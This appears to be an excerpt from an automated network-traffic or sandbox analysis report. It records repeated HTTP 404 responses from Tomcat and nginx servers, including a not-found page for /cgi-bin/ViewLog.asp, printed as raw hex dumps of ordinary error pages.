3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:48 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:48 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:52 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:52 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:44 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:46 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Thu, 23 Nov 2023 04:15:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
